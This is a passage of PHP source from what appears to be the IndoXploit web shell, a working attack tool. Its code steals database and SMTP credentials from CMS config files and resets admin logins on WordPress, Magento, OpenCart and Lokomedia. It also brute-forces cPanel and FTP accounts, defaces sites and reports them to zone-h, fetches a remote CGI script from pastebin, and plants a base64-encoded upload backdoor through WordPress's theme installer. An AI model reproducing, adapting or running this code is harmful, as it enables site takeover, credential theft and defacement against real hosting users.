854. echo "Config => ".$file_conf."<br>";
855. echo "CMS => Wordpress<br>";
856. echo $url_target;
857. if(!$update OR !$conn OR !$db) {
858. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
859. } else {
860. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
861. }
862. mysql_close($conn);
863. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
864. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
865. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
866. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
867. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
868. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
869. $prefix = $dbprefix."admin_user";
870. $option = $dbprefix."core_config_data";
871. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
872. $db = mysql_select_db($dbname);
873. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
874. $result = mysql_fetch_array($q);
875. $id = $result[user_id];
876. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
877. $result2 = mysql_fetch_array($q2);
878. $target = $result2[value];
879. if($target == '') {
880. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
881. } else {
882. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
883. }
884. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
885. echo "Config => ".$file_conf."<br>";
886. echo "CMS => Magento<br>";
887. echo $url_target;
888. if(!$update OR !$conn OR !$db) {
889. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
890. } else {
891. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
892. }
893. mysql_close($conn);
894. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
895. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
896. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
897. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
898. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
899. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
900. $prefix = $dbprefix."user";
901. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
902. $db = mysql_select_db($dbname);
903. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
904. $result = mysql_fetch_array($q);
905. $id = $result[user_id];
906. $target = ambilkata($config,"HTTP_SERVER', '","'");
907. if($target == '') {
908. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
909. } else {
910. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
911. }
912. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
913. echo "Config => ".$file_conf."<br>";
914. echo "CMS => OpenCart<br>";
915. echo $url_target;
916. if(!$update OR !$conn OR !$db) {
917. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
918. } else {
919. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
920. }
921. mysql_close($conn);
922. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
923. $dbhost = ambilkata($config,'server = "','"');
924. $dbuser = ambilkata($config,'username = "','"');
925. $dbpass = ambilkata($config,'password = "','"');
926. $dbname = ambilkata($config,'database = "','"');
927. $prefix = "users";
928. $option = "identitas";
929. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
930. $db = mysql_select_db($dbname);
931. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
932. $result = mysql_fetch_array($q);
933. $target = $result[alamat_website];
934. if($target == '') {
935. $target2 = $result[url];
936. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
937. if($target2 == '') {
938. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
939. } else {
940. $cek_login3 = file_get_contents("$target2/adminweb/");
941. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
942. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
943. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
944. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
945. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
946. } else {
947. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
948. }
949. }
950. } else {
951. $cek_login = file_get_contents("$target/adminweb/");
952. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
953. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
954. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
955. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
956. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
957. } else {
958. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
959. }
960. }
961. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
962. echo "Config => ".$file_conf."<br>";
963. echo "CMS => Lokomedia<br>";
964. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
965. echo $url_target2;
966. } else {
967. echo $url_target;
968. }
969. if(!$update OR !$conn OR !$db) {
970. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
971. } else {
972. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
973. }
974. mysql_close($conn);
975. }
976. }
977. }
978. } else {
979. echo "<center>
980. <h1>Auto Edit User Config</h1>
981. <form method='post'>
982. DIR Config: <br>
983. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
984. Set User & Pass: <br>
985. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
986. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
987. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
988. </form>
989. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
990. ";
991. }
992. } elseif($_GET['do'] == 'cpanel') {
993. if($_POST['crack']) {
994. $usercp = explode("\r\n", $_POST['user_cp']);
995. $passcp = explode("\r\n", $_POST['pass_cp']);
996. $i = 0;
997. foreach($usercp as $ucp) {
998. foreach($passcp as $pcp) {
999. if(@mysql_connect('localhost', $ucp, $pcp)) {
1000. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1001. } else {
1002. $_SESSION[$ucp] = "1";
1003. $_SESSION[$pcp] = "1";
1004. if($ucp == '' || $pcp == '') {
1005.  
1006. } else {
1007. $i++;
1008. if(function_exists('posix_getpwuid')) {
1009. $domain_cp = file_get_contents("/etc/named.conf");
1010. if($domain_cp == '') {
1011. $dom = "<font color=red>ERROR!</font>";
1012. } else {
1013. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1014. foreach($domains_cp[1] as $dj) {
1015. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1016. $user_cp_url = $user_cp_url['name'];
1017. if($user_cp_url == $ucp) {
1018. $dom = "<a href='http://$dj/' target='_blank'><font color=red>$dj</font></a>";
1019. break;
1020. }
1021. }
1022. }
1023. } else {
1024. $dom = "<font color=red>function is Disable by system</font>";
1025. }
1026. echo "username (<font color=red>$ucp</font>) password (<font color=red>$pcp</font>) domain ($dom)<br>";
1027. }
1028. }
1029. }
1030. }
1031. }
1032. if($i == 0) {
1033. } else {
1034. echo "<br>sukses nyolong ".$i." Cpanel by <font color=red>IndoXploit.</font>";
1035. }
1036. } else {
1037. echo "<center>
1038. <form method='post'>
1039. USER: <br>
1040. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1041. $_usercp = fopen("/etc/passwd","r");
1042. while($getu = fgets($_usercp)) {
1043. if($getu == '' || !$_usercp) {
1044. echo "<font color=red>Can't read /etc/passwd</font>";
1045. } else {
1046. preg_match_all("/(.*?):x:/", $getu, $u);
1047. foreach($u[1] as $user_cp) {
1048. if(is_dir("/home/$user_cp/public_html")) {
1049. echo "$user_cp\n";
1050. }
1051. }
1052. }
1053. }
1054. echo "</textarea><br>
1055. PASS: <br>
1056. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1057. function cp_pass($dir) {
1058. $pass = "";
1059. $dira = scandir($dir);
1060. foreach($dira as $dirb) {
1061. if(!is_file("$dir/$dirb")) continue;
1062. $ambil = file_get_contents("$dir/$dirb");
1063. if(preg_match("/WordPress/", $ambil)) {
1064. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1065. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1066. $pass .= ambilkata($ambil,"password = '","'")."\n";
1067. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1068. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1069. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1070. $pass .= ambilkata($ambil,'password = "','"')."\n";
1071. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1072. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1073. } elseif(preg_match("/^[client]$/", $ambil)) {
1074. preg_match("/password=(.*?)/", $ambil, $pass1);
1075. if(preg_match('/"/', $pass1[1])) {
1076. $pass1[1] = str_replace('"', "", $pass1[1]);
1077. $pass .= $pass1[1]."\n";
1078. } else {
1079. $pass .= $pass1[1]."\n";
1080. }
1081. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1082. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1083. }
1084. }
1085. echo $pass;
1086. }
1087. $cp_pass = cp_pass($dir);
1088. echo $cp_pass;
1089. echo "</textarea><br>
1090. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1091. </form>
1092. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1093. }
1094. } elseif($_GET['do'] == 'cpftp_auto') {
1095. if($_POST['crack']) {
1096. $usercp = explode("\r\n", $_POST['user_cp']);
1097. $passcp = explode("\r\n", $_POST['pass_cp']);
1098. $i = 0;
1099. foreach($usercp as $ucp) {
1100. foreach($passcp as $pcp) {
1101. if(@mysql_connect('localhost', $ucp, $pcp)) {
1102. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1103. } else {
1104. $_SESSION[$ucp] = "1";
1105. $_SESSION[$pcp] = "1";
1106. if($ucp == '' || $pcp == '') {
1107. //
1108. } else {
1109. echo "[+] username (<font color=red>$ucp</font>) password (<font color=red>$pcp</font>)<br>";
1110. $ftp_conn = ftp_connect($ip);
1111. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1112. if((!$ftp_login) || (!$ftp_conn)) {
1113. echo "[+] <font color=red>Login Gagal</font><br><br>";
1114. } else {
1115. echo "[+] <font color=red>Login Sukses</font><br>";
1116. $fi = htmlspecialchars($_POST['file_deface']);
1117. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1118. if($deface) {
1119. $i++;
1120. echo "[+] <font color=red>Deface Sukses</font><br>";
1121. if(function_exists('posix_getpwuid')) {
1122. $domain_cp = file_get_contents("/etc/named.conf");
1123. if($domain_cp == '') {
1124. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1125. } else {
1126. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1127. foreach($domains_cp[1] as $dj) {
1128. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1129. $user_cp_url = $user_cp_url['name'];
1130. if($user_cp_url == $ucp) {
1131. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1132. break;
1133. }
1134. }
1135. }
1136. } else {
1137. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1138. }
1139. } else {
1140. echo "[-] <font color=red>Deface Gagal</font><br><br>";
1141. }
1142. }
1143. //echo "username (<font color=red>$ucp</font>) password (<font color=red>$pcp</font>)<br>";
1144. }
1145. }
1146. }
1147. }
1148. }
1149. if($i == 0) {
1150. } else {
1151. echo "<br>sukses deface ".$i." Cpanel by <font color=red>IndoXploit.</font>";
1152. }
1153. } else {
1154. echo "<center>
1155. <form method='post'>
1156. Filename: <br>
1157. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1158. Deface Page: <br>
1159. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1160. USER: <br>
1161. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1162. $_usercp = fopen("/etc/passwd","r");
1163. while($getu = fgets($_usercp)) {
1164. if($getu == '' || !$_usercp) {
1165. echo "<font color=red>Can't read /etc/passwd</font>";
1166. } else {
1167. preg_match_all("/(.*?):x:/", $getu, $u);
1168. foreach($u[1] as $user_cp) {
1169. if(is_dir("/home/$user_cp/public_html")) {
1170. echo "$user_cp\n";
1171. }
1172. }
1173. }
1174. }
1175. echo "</textarea><br>
1176. PASS: <br>
1177. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1178. function cp_pass($dir) {
1179. $pass = "";
1180. $dira = scandir($dir);
1181. foreach($dira as $dirb) {
1182. if(!is_file("$dir/$dirb")) continue;
1183. $ambil = file_get_contents("$dir/$dirb");
1184. if(preg_match("/WordPress/", $ambil)) {
1185. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1186. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1187. $pass .= ambilkata($ambil,"password = '","'")."\n";
1188. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1189. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1190. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1191. $pass .= ambilkata($ambil,'password = "','"')."\n";
1192. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1193. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1194. } elseif(preg_match("/client/", $ambil)) {
1195. preg_match("/password=(.*)/", $ambil, $pass1);
1196. if(preg_match('/"/', $pass1[1])) {
1197. $pass1[1] = str_replace('"', "", $pass1[1]);
1198. $pass .= $pass1[1]."\n";
1199. }
1200. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1201. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1202. }
1203. }
1204. echo $pass;
1205. }
1206. $cp_pass = cp_pass($dir);
1207. echo $cp_pass;
1208. echo "</textarea><br>
1209. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1210. </form>
1211. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1212. }
1213. } elseif($_GET['do'] == 'smtp') {
1214. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1215. function scj($dir) {
1216. $dira = scandir($dir);
1217. foreach($dira as $dirb) {
1218. if(!is_file("$dir/$dirb")) continue;
1219. $ambil = file_get_contents("$dir/$dirb");
1220. $ambil = str_replace("$", "", $ambil);
1221. if(preg_match("/JConfig|joomla/", $ambil)) {
1222. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1223. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1224. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1225. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1226. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1227. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1228. echo "SMTP Host: <font color=red>$smtp_host</font><br>";
1229. echo "SMTP port: <font color=red>$smtp_port</font><br>";
1230. echo "SMTP user: <font color=red>$smtp_user</font><br>";
1231. echo "SMTP pass: <font color=red>$smtp_pass</font><br>";
1232. echo "SMTP auth: <font color=red>$smtp_auth</font><br>";
1233. echo "SMTP secure: <font color=red>$smtp_secure</font><br><br>";
1234. }
1235. }
1236. }
1237. $smpt_hunter = scj($dir);
1238. echo $smpt_hunter;
1239. } elseif($_GET['do'] == 'auto_wp') {
1240. if($_POST['hajar']) {
1241. $title = htmlspecialchars($_POST['new_title']);
1242. $pn_title = str_replace(" ", "-", $title);
1243. if($_POST['cek_edit'] == "Y") {
1244. $script = $_POST['edit_content'];
1245. } else {
1246. $script = $title;
1247. }
1248. $conf = $_POST['config_dir'];
1249. $scan_conf = scandir($conf);
1250. foreach($scan_conf as $file_conf) {
1251. if(!is_file("$conf/$file_conf")) continue;
1252. $config = file_get_contents("$conf/$file_conf");
1253. if(preg_match("/WordPress/", $config)) {
1254. $dbhost = ambilkata($config,"DB_HOST', '","'");
1255. $dbuser = ambilkata($config,"DB_USER', '","'");
1256. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1257. $dbname = ambilkata($config,"DB_NAME', '","'");
1258. $dbprefix = ambilkata($config,"table_prefix = '","'");
1259. $prefix = $dbprefix."posts";
1260. $option = $dbprefix."options";
1261. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1262. $db = mysql_select_db($dbname);
1263. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1264. $result = mysql_fetch_array($q);
1265. $id = $result[ID];
1266. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1267. $result2 = mysql_fetch_array($q2);
1268. $target = $result2[option_value];
1269. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1270. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1271. echo "<div style='margin: 5px auto;'>";
1272. if($target == '') {
1273. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1274. } else {
1275. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1276. }
1277. if(!$update OR !$conn OR !$db) {
1278. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1279. } else {
1280. echo "<font color=red>sukses di ganti.</font><br>";
1281. }
1282. echo "</div>";
1283. mysql_close($conn);
1284. }
1285. }
1286. } else {
1287. echo "<center>
1288. <h1>Auto Edit Title+Content WordPress</h1>
1289. <form method='post'>
1290. DIR Config: <br>
1291. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1292. Set Title: <br>
1293. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
1294. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1295. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1296. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1297. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1298. </form>
1299. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1300. ";
1301. }
1302. } elseif($_GET['do'] == 'zoneh') {
1303. if($_POST['submit']) {
1304. $domain = explode("\r\n", $_POST['url']);
1305. $nick = $_POST['nick'];
1306. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1307. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1308. function zoneh($url,$nick) {
1309. $ch = curl_init("http://www.zone-h.com/notify/single");
1310. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1311. curl_setopt($ch, CURLOPT_POST, true);
1312. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1313. return curl_exec($ch);
1314. curl_close($ch);
1315. }
1316. foreach($domain as $url) {
1317. $zoneh = zoneh($url,$nick);
1318. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1319. echo "$url -> <font color=red>OK</font><br>";
1320. } else {
1321. echo "$url -> <font color=red>ERROR</font><br>";
1322. }
1323. }
1324. } else {
1325. echo "<center><form method='post'>
1326. <u>Defacer</u>: <br>
1327. <input type='text' name='nick' size='50' value='IndoXploit'><br>
1328. <u>Domains</u>: <br>
1329. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1330. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1331. </form>";
1332. }
1333. echo "</center>";
1334. } elseif($_GET['do'] == 'cgi') {
1335. $cgi_dir = mkdir('idx_cgi', 0755);
1336. $file_cgi = "idx_cgi/cgi.izo";
1337. $isi_htcgi = "AddHandler cgi-script .izo";
1338. $htcgi = fopen(".htaccess", "w");
1339. fwrite($htcgi, $isi_htcgi);
1340. fclose($htcgi);
1341. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1342. $cgi = fopen($file_cgi, "w");
1343. fwrite($cgi, $cgi_script);
1344. fclose($cgi);
1345. chmod($file_cgi, 0755);
1346. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1347. } elseif($_GET['do'] == 'fake_root') {
1348. ob_start();
1349. $cwd = getcwd();
1350. $ambil_user = explode("/", $cwd);
1351. $user = $ambil_user[2];
1352. if($_POST['reverse']) {
1353. $site = explode("\r\n", $_POST['url']);
1354. $file = $_POST['file'];
1355. foreach($site as $url) {
1356. $cek = getsource("$url/~$user/$file");
1357. if(preg_match("/hacked/i", $cek)) {
1358. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=red>Fake Root!</font><br>";
1359. }
1360. }
1361. } else {
1362. echo "<center><form method='post'>
1363. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1364. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1365. Domain: <br>
1366. <textarea style='width: 450px; height: 250px;' name='url'>";
1367. reverse($_SERVER['HTTP_HOST']);
1368. echo "</textarea><br>
1369. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1370. </form><br>
1371. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1372. }
1373. } elseif($_GET['do'] == 'adminer') {
1374. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1375. function adminer($url, $isi) {
1376. $fp = fopen($isi, "w");
1377. $ch = curl_init();
1378. curl_setopt($ch, CURLOPT_URL, $url);
1379. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1380. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1381. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1382. curl_setopt($ch, CURLOPT_FILE, $fp);
1383. return curl_exec($ch);
1384. curl_close($ch);
1385. fclose($fp);
1386. ob_flush();
1387. flush();
1388. }
1389. if(file_exists('adminer.php')) {
1390. echo "<center><font color=red><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1391. } else {
1392. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1393. echo "<center><font color=red><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1394. } else {
1395. echo "<center><font color=red>gagal buat file adminer</font></center>";
1396. }
1397. }
1398. } elseif($_GET['do'] == 'auto_dwp') {
1399. if($_POST['auto_deface_wp']) {
1400. function anucurl($sites) {
1401. $ch = curl_init($sites);
1402. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1403. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1404. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1405. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1406. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1407. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1408. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1409. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1410. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1411. $data = curl_exec($ch);
1412. curl_close($ch);
1413. return $data;
1414. }
1415. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1416. $post = array(
1417. "log" => "$userr",
1418. "pwd" => "$pass",
1419. "rememberme" => "forever",
1420. "wp-submit" => "$wp_submit",
1421. "redirect_to" => "$web",
1422. "testcookie" => "1",
1423. );
1424. $ch = curl_init($cek);
1425. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1426. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1427. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1428. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1429. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1430. curl_setopt($ch, CURLOPT_POST, 1);
1431. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1432. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1433. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1434. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1435. $data = curl_exec($ch);
1436. curl_close($ch);
1437. return $data;
1438. }
1439. $scan = $_POST['link_config'];
1440. $link_config = scandir($scan);
1441. $script = htmlspecialchars($_POST['script']);
1442. $user = "indoxploit";
1443. $pass = "indoxploit";
1444. $passx = md5($pass);
1445. foreach($link_config as $dir_config) {
1446. if(!is_file("$scan/$dir_config")) continue;
1447. $config = file_get_contents("$scan/$dir_config");
1448. if(preg_match("/WordPress/", $config)) {
1449. $dbhost = ambilkata($config,"DB_HOST', '","'");
1450. $dbuser = ambilkata($config,"DB_USER', '","'");
1451. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1452. $dbname = ambilkata($config,"DB_NAME', '","'");
1453. $dbprefix = ambilkata($config,"table_prefix = '","'");
1454. $prefix = $dbprefix."users";
1455. $option = $dbprefix."options";
1456. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1457. $db = mysql_select_db($dbname);
1458. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1459. $result = mysql_fetch_array($q);
1460. $id = $result[ID];
1461. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1462. $result2 = mysql_fetch_array($q2);
1463. $target = $result2[option_value];
1464. if($target == '') {
1465. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1466. } else {
1467. echo "[+] $target <br>";
1468. }
1469. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1470. if(!$conn OR !$db OR !$update) {
1471. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1472. mysql_close($conn);
1473. } else {
1474. $site = "$target/wp-login.php";
1475. $site2 = "$target/wp-admin/theme-install.php?upload";
1476. $b1 = anucurl($site2);
1477. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1478. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1479. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1480. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1481. $www = "m.php";
1482. $fp5 = fopen($www,"w");
1483. fputs($fp5,$upload3);
1484. $post2 = array(
1485. "_wpnonce" => "$anu2",
1486. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1487. "themezip" => "@$www",
1488. "install-theme-submit" => "Install Now",
1489. );
1490. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1491. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1492. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1493. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1494. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1495. curl_setopt($ch, CURLOPT_POST, 1);
1496. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
